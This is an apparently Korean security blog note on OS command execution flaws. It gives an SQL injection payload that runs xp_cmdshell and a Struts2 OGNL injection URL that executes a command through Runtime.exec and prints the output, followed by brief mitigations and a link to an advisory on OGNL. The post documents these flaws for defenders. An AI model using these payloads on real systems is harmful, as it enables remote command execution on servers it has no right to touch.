SQL에서 운영체제 명령실행
param1=;exec master..xp_cmdshell 'md c:/abc' -- '
jsp에서 운영체제 명령실행
http://192.168.0.14:8080/struts2-showcase/test.jsp?param=%23cmd='hostname', %23a=@java.lang.Runtime@getRuntime().exec(%23cmd).getInputStream(),%23b=new%20java.io.InputStreamReader(%23a),%23c=new%20java.io.BufferedReader(%23b),%23d=new%20char[10000],%23c.read(%23d),%23e=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23e.println(%23d),%23e.close
운영체제 명령실행 취약점은 웹서버의 권한을 낮춰서 명령결과를 최소화 시키고 php.ini의 safe_mode=On 설정
jsp에서는 Runtime.exe를 사용해야한다면 파라미터 값에 대한 검증절차 필수
http://blog.skinfosec.com/220954123887
[보안동향] OGNL 표현식 사용 시 잘못된 코딩으로 인한 원격 코드 실행 취약점
보안동향 . OGNL 표현식 사용 시 잘못된 코딩으로 인한 원격 코드 실행 취약점 OGNL(Object Grap...
blog.naver.com
'웹 > 보안' 카테고리의 다른 글
SSTI (0) | 2019.10.01 |
---|---|
파이썬 SQL 인젝션 (0) | 2019.09.30 |
주요 Editor 샘플페이지 정리 (0) | 2019.08.16 |
XSS 정리 (0) | 2019.08.09 |
Response 헤더 정보노출 취약점 (0) | 2019.08.09 |